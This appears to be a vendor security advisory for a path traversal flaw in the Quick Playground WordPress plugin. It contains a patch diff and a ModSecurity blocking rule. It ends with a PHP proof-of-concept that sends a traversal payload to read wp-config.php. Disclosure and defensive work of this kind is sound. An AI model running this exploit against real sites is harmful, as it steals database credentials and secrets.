Atomic Edge analysis of CVE-2026-6403: This vulnerability allows unauthenticated path traversal to arbitrary file read in the Quick Playground plugin for WordPress, versions up to and including 1.3.3. The flaw exists in the qckply_zip_theme() function, which accepts a user-controlled ‘stylesheet’ parameter and appends it directly to the theme root directory path without sanitizing directory traversal sequences. An attacker can read sensitive files such as wp-config.php. The CVSS score is 7.5 (High), and it is classified under CWE-22 (Path Traversal).
The root cause is in the qckply_zip_theme() function located in /quick-playground/utility.php at line 246 (old code). The function builds the source directory path by concatenating get_theme_root() with the ‘/’ separator and the unsanitized $stylesheet parameter: ‘$source_directory = get_theme_root() . ‘/’ . $stylesheet;’. The $stylesheet parameter is passed directly from a POST request without any validation for directory traversal sequences such as ‘../’. This allows an attacker to traverse up the directory tree from the theme root and access any readable file on the server. The function then creates a ZIP archive of the resulting directory, exfiltrating its contents.
Exploitation requires sending a POST request to ‘/wp-admin/admin-ajax.php’ with the ‘action’ parameter set to a value that triggers qckply_zip_theme() (likely ‘qckply_zip_theme’ or a related action hook). The attacker includes a ‘stylesheet’ parameter containing traversal sequences, for example: ‘stylesheet=../../../../wp-config’. The vulnerable function will resolve this to a path like ‘/var/www/html/wp-content/themes/../../../../wp-config’, which traverses up to the WordPress root and reads the wp-config.php file. The result is zipped and made available to the attacker, who can then download the ZIP from the plugin’s uploads folder. No authentication is required.
The patch adds a permission check using ‘current_user_can(‘manage_options’)’ at the start of the qckply_zip_theme() function (and also in qckply_zip_current_theme() and qckply_zip_plugin()). Before the patch, the function had no capability check, allowing unauthenticated users to call it. After the patch, only authenticated administrators (users with the ‘manage_options’ capability) can trigger the zip function. This effectively blocks the entire attack vector because the function will exit early if the user is not an admin, preventing any path traversal from being processed.
The impact of this vulnerability is severe. An unauthenticated attacker can read arbitrary files from the server’s filesystem, including sensitive configuration files like wp-config.php that contain database credentials, salts, and other secrets. This could lead to full site compromise through subsequent attacks on the database or other services. The plugin’s ability to create ZIP archives of the traversed directory means the attacker can exfiltrate entire directory contents, not just individual files.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/quick-playground/quick-playground.php
+++ b/quick-playground/quick-playground.php
@@ -3,7 +3,7 @@
* Plugin Name: Quick Playground
* Plugin URI: https://quickplayground.com
* Description: Preview your content in different themes or test plugins using WordPress Playground. Quickly create Theme and Plugin demo, testing, and staging websites.
- * Version: 1.3.3
+ * Version: 1.3.4
* Author: David F. Carr
* License: GPL2
* Text Domain: quick-playground
--- a/quick-playground/utility.php
+++ b/quick-playground/utility.php
@@ -223,6 +223,9 @@
* @return string Success or failure message.
*/
function qckply_zip_current_theme() {
+ if(!current_user_can('manage_options')) {
+ return;
+ }
$qckply_directories = qckply_get_directories();
$qckply_uploads = $qckply_directories['uploads'];
$source_directory = get_theme_root() . '/' . get_stylesheet(); // Get theme path
@@ -240,6 +243,9 @@
* @return string Success or failure message.
*/
function qckply_zip_theme($stylesheet) {
+ if(!current_user_can('manage_options')) {
+ return;
+ }
$qckply_directories = qckply_get_directories();
$qckply_uploads = $qckply_directories['uploads'];
$source_directory = get_theme_root() . '/' . $stylesheet; // Get theme path
@@ -257,6 +263,9 @@
* @return string|bool Success message or false on failure.
*/
function qckply_zip_plugin($slug) {
+ if(!current_user_can('manage_options')) {
+ return;
+ }
$qckply_directories = qckply_get_directories();
$qckply_uploads = $qckply_directories['uploads'];
$source_directory = trailingslashit(dirname(plugin_dir_path(__FILE__))) .$slug; // Get plugin path
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6403 via Quick Playground AJAX Path Traversal',severity:'CRITICAL',tag:'CVE-2026-6403'"
SecRule ARGS_POST:action "@streq qckply_zip_theme" "chain"
SecRule ARGS_POST:stylesheet "@rx ../" "t:none"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6403 - Quick Playground <= 1.3.3 - Unauthenticated Path Traversal to Arbitrary File Read via 'stylesheet' Parameter
// Configure target URL
$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// The file to read (relative to theme root). Traverse up to WordPress root and target wp-config.php
$traversal_path = '../../../../wp-config';
// Initialize cURL
$ch = curl_init();
// Set the target URL
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
// Set POST fields: the action parameter (likely 'qckply_zip_theme' but may vary) and the malicious stylesheet path
$post_fields = [
'action' => 'qckply_zip_theme', // Default AJAX action hook; adjust if needed
'stylesheet' => $traversal_path
];
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
// Execute the request
$response = curl_exec($ch);
// Check for errors
if (curl_errno($ch)) {
echo 'cURL error: ' . curl_error($ch) . "n";
curl_close($ch);
exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_coden";
echo "Response Body:n$responsenn";
// If successful, the response may contain a success message or the ZIP filename.
// Typically, the ZIP file is saved to wp-content/uploads/quick-playground/ and the response includes its location.
// The attacker would then download that ZIP file to retrieve the exfiltrated files.
if ($http_code == 200 && !empty($response)) {
echo "Exploit attempt completed. Check the response for a ZIP file path to download.n";
} else {
echo "Exploit may have failed or the plugin is patched.n";
}
?>
